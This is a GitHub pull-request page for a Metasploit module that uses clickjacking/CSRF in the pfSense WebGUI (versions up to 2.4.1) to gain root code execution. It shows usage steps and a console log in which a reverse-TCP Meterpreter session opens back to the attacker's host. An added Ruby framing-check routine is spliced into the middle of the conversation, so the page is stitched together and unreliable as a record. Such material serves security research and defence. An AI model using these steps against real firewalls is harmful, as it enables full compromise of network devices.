Add exploit module for Clickjacking vulnerability in CSRF error page pfSense <= 2.4.1 #9234


Merged (6 commits) on Dec 12, 2017

Conversation

ykoster
Contributor

@ykoster ykoster commented Nov 22, 2017

This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.

pfSense is a free and open source firewall and router. It was found that the pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin into interacting with a specially crafted webpage it is possible for an attacker to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user, this will result in a full compromise of the pfSense instance.

Verification

The victim should be able to access the WebGUI & must be logged in as admin in order for this exploit to work. Possibly the WebGUI's TLS certificate must be trusted in the browser.

  • use exploit/unix/http/pfsense_clickjacking
  • set TARGETURI https://<ip WebGUI>
  • exploit
  • Browse to the URL returned by MSF
  • Click anywhere on the returned page
  • Note that a new Meterpreter session was started.
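The attack described above only works because the WebGUI response can be embedded in a page served from another origin. As an added example (editor-written, not code from this module or from the pfSense project), the Ruby function below decides from a response's headers whether a page at site_url may be framed by a page at framer_url, applying the X-Frame-Options rules (DENY, SAMEORIGIN, obsolete ALLOW-FROM) and CSP frame-ancestors, which overrides X-Frame-Options when both are present. The header hashes, host names and URLs are constructed for illustration and are not captured from a pfSense instance. Since the title of this PR names the CSRF error page specifically, the check is worth running against the response of that page, not only against the login page.

```ruby
# Added example, not code from the Metasploit module or from pfSense: decide
# whether a response can be framed by a third-party page, which is the
# precondition for the clickjacking step in this PR.
#
# Rules applied:
#   * A CSP `frame-ancestors` directive, when present, overrides X-Frame-Options.
#   * X-Frame-Options DENY blocks all framing; SAMEORIGIN allows only the same
#     scheme+host+port; the obsolete ALLOW-FROM is ignored by current browsers,
#     so it counts as no protection.
#   * Neither header present means the page is frameable.
require 'uri'

# Case-insensitive header lookup on a plain Hash of response headers.
def header(headers, name)
  key = headers.keys.find { |k| k.to_s.casecmp?(name) }
  key.nil? ? nil : headers[key]
end

# Split a Content-Security-Policy value into { directive => [source, ...] }.
def parse_csp(value)
  value.to_s.split(';').each_with_object({}) do |directive, acc|
    name, *sources = directive.strip.split(/\s+/)
    next if name.nil? || name.empty?
    acc[name.downcase] = sources.map(&:downcase)
  end
end

def same_origin?(a, b)
  a.scheme == b.scheme && a.host.casecmp?(b.host) && a.port == b.port
end

# Match one frame-ancestors host-source (e.g. "https://*.corp.example" or
# "intranet.corp.example:8443") against the framing page's origin.
def host_source_matches?(source, framer)
  scheme, rest = source.include?('://') ? source.split('://', 2) : [nil, source]
  host = rest.split('/', 2).first.split(':', 2).first   # drop path and port
  return false if scheme && scheme != framer.scheme
  if host.start_with?('*.')
    # "*.corp.example" matches "a.corp.example" but not the bare "corp.example"
    framer.host.downcase.end_with?(host[1..-1])
  else
    framer.host.casecmp?(host)
  end
end

def source_matches?(source, framer, site)
  case source
  when "'none'" then false
  when "'self'" then same_origin?(framer, site)
  when '*' then true
  when /\A[a-z][a-z0-9+.\-]*:\z/ then framer.scheme == source.chomp(':') # scheme-source, e.g. "https:"
  else host_source_matches?(source, framer)
  end
end

# True when a page from site_url, served with `headers`, can be framed by framer_url.
def frameable_by?(headers, site_url:, framer_url:)
  site   = URI.parse(site_url)
  framer = URI.parse(framer_url)

  csp = parse_csp(header(headers, 'Content-Security-Policy'))
  if csp.key?('frame-ancestors')
    # An empty source list behaves like 'none'.
    return csp['frame-ancestors'].any? { |src| source_matches?(src, framer, site) }
  end

  case header(headers, 'X-Frame-Options').to_s.strip.upcase
  when 'DENY'       then false
  when 'SAMEORIGIN' then same_origin?(framer, site)
  else true   # header missing, or ALLOW-FROM, which current browsers ignore
  end
end

# Constructed sample responses (not captured from a real pfSense instance).
NO_PROTECTION = { 'Content-Type' => 'text/html; charset=utf-8' }
HARDENED      = { 'X-Frame-Options' => 'SAMEORIGIN',
                  'Content-Security-Policy' => "default-src 'self'; frame-ancestors 'self'" }

if __FILE__ == $PROGRAM_NAME
  [NO_PROTECTION, HARDENED].each do |h|
    puts "#{h.inspect} -> frameable by attacker: " \
         "#{frameable_by?(h, site_url: 'https://fw.example.net', framer_url: 'http://attacker.example')}"
  end
end
```

To use it against a live system, feed the function the header hash of the response for the page under test (for this PR, the CSRF error page) together with the WebGUI's own URL and the origin an attacker would serve from; a true result means the clickjacking precondition holds.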

resp.body = %Q|<!DOCTYPE html>
<html>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css" />

I don't think that we want to depend on external javascript :/

@ykoster
Contributor Author

ykoster commented Dec 2, 2017

Included static content as suggested by @jvoisin

@wchen-r7 wchen-r7 self-assigned this Dec 12, 2017
@wchen-r7
Contributor

Works as advertised:

msf exploit(pfsense_clickjacking) > show options

Module options (exploit/unix/http/pfsense_clickjacking):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   SRVHOST    0.0.0.0               yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  http://172.16.85.132  yes       The base path to the web application
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.85.1      yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   pfSense <= 2.4.1


msf exploit(pfsense_clickjacking) > set srvhost 172.16.85.1
srvhost => 172.16.85.1
msf exploit(pfsense_clickjacking) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.85.1:4444 
[*] Using URL: http://172.16.85.1:8080/vB3oWRYgtwaFtR
[*] Server started.
msf exploit(pfsense_clickjacking) > [*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/cookieconsent.min.css Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/cookieconsent.min.js Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/background.jpg Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] Sending stage (37543 bytes) to 172.16.85.132
[*] Meterpreter session 1 opened (172.16.85.1:4444 -> 172.16.85.132:43529) at 2017-12-12 14:25:36 -0600

@wchen-r7 wchen-r7 merged commit 942e44c into rapid7:master Dec 12, 2017
wchen-r7 added a commit that referenced this pull request Dec 12, 2017
@wchen-r7
Contributor

Release Notes

This exploits a CSRF in pfSense that allows the attacker to perform a click-jacking attack.

@stevenseeley
Contributor

stevenseeley commented Dec 12, 2017

I know this is already merged, but I am just curious, where in the module is the csrf click jacking page used (csrf-magic.php) as per the blog post? This looks like a csrf attack to diag_command.php, in which case, no clicky is required.

@h00die
Contributor

h00die commented Dec 12, 2017

Line 82 shows diag_command.php as the target

@stevenseeley
Contributor

stevenseeley commented Dec 13, 2017

Huh, where? Also, my point still stands. This is CSRF, isn't it?

@h00die
Contributor

h00die commented Dec 13, 2017

https://github.com/rapid7/metasploit-framework/pull/9234/files#diff-5b9c9bad22d0dde20b2a408968e1490cR82

@stevenseeley
Contributor

Yep, I see how it's working now. My bad.

@ykoster
Contributor Author

ykoster commented Dec 13, 2017

I suppose targeting the file editor would also work, less trivial though.

8 participants